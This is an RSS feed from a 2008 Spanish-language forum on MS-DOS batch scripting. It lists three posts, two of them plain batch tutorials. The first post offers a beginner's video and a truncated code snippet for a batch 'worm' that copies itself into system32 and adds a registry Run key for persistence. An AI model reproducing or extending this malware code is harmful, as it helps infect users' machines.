<?xml version="1.0" encoding="iso-8859-1"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title>BATCH</title>
		<link>http://grupoblackstreet.foroactivo.net/batch-f8/-t1.htm</link>
		<description>AQUI ES PARA HABLAR Y APRENDER SOBRE EL LENGUAJE BATCH DE MS-DOS</description>
		<lastBuildDate>Wed, 01 Oct 2008 20:05:29 GMT</lastBuildDate>
		<ttl>10</ttl>
		<image>
			<title>BATCH</title>
			<url>http://i48.servimg.com/u/f48/12/68/01/50/blacks10.png</url>
			<link>http://grupoblackstreet.foroactivo.net/batch-f8/-t1.htm</link>
		</image>
		<item>
			<title>crear un gusano en batch {by cybor}</title>
			<link>http://grupoblackstreet.foroactivo.net/batch-f8/crear-un-gusano-en-batch-by-cybor-t68.htm</link>
			<dc:creator>xstonex</dc:creator>
			<description>crear un gusano en batch {by cybor}



Video de como crear un virus gusano en batch desde 0. Ideal para novatos en el tema.



http://www.youtube.com/watch?v=_oY9[....]com.ar/search/label/GUSANOS%2FWORMS



Codigo:

_____________________________________________

@echo off

copy %0%windir%\system32\worm.bat

REG ADD HKLM\software\microsoft\windows\currentversion\run /v hack

/d %windir%\system32\worm.bat

:worm

cd\

cd %homepatch%

cd escritorio

echo worm &gt;&gt; %ramdom%.exe

echo  ...</description>
			<category>BATCH</category>
			<pubDate>Wed, 01 Oct 2008 20:05:29 GMT</pubDate>
			<comments>http://grupoblackstreet.foroactivo.net/batch-f8/crear-un-gusano-en-batch-by-cybor-t68.htm#137</comments>
			<guid>http://grupoblackstreet.foroactivo.net/batch-f8/crear-un-gusano-en-batch-by-cybor-t68.htm</guid>
		</item>
		<item>
			<title>Programacion Batch avanzada</title>
			<link>http://grupoblackstreet.foroactivo.net/batch-f8/programacion-batch-avanzada-t67.htm</link>
			<dc:creator>xstonex</dc:creator>
			<description>Programacion Batch avanzada





Temario.

1.- Variables y Argumentos.

2.- Imprimir caracteres de comandos.

3.- Algunas otras variables de Entorno.

4.- IF

5.- FOR

6.- Funciones

7.- Includes

8.- Misc

9.- EOF



Variables y Argumentos



El manejo de variables en batch, es muy flexible., y este nos permite hacer desde operaciones matemáticas, hasta seleccionar ciertas partes de una variable, asi como reemplazar cadenas de texto, y obtener archivos.. y sus propiedades, la  ...</description>
			<category>BATCH</category>
			<pubDate>Wed, 01 Oct 2008 19:59:38 GMT</pubDate>
			<comments>http://grupoblackstreet.foroactivo.net/batch-f8/programacion-batch-avanzada-t67.htm#134</comments>
			<guid>http://grupoblackstreet.foroactivo.net/batch-f8/programacion-batch-avanzada-t67.htm</guid>
		</item>
		<item>
			<title>Guia Batch/Ms-Dos para Newbites</title>
			<link>http://grupoblackstreet.foroactivo.net/batch-f8/guia-batch-ms-dos-para-newbites-t66.htm</link>
			<dc:creator>xstonex</dc:creator>
			<description>------------------------------------

¿Qué es el Ms-Dos y El Batch?

------------------------------------



MS-DOS, (MicroSoft Disk Operating System), Sistema operativo de disco de Microsoft. Es un sistema operativo comercializado por Microsoft perteneciente a la familia DOS. Fue un sistema operativo para el IBM PC que alcanzó gran difusión.



BATCH, es un archivo de texto que se emplea para ejecutar series de comandos automáticamente (su extensión es .bat). Se compone de todos los comandos  ...</description>
			<category>BATCH</category>
			<pubDate>Wed, 01 Oct 2008 19:56:18 GMT</pubDate>
			<comments>http://grupoblackstreet.foroactivo.net/batch-f8/guia-batch-ms-dos-para-newbites-t66.htm#132</comments>
			<guid>http://grupoblackstreet.foroactivo.net/batch-f8/guia-batch-ms-dos-para-newbites-t66.htm</guid>
		</item>
	</channel>
</rss>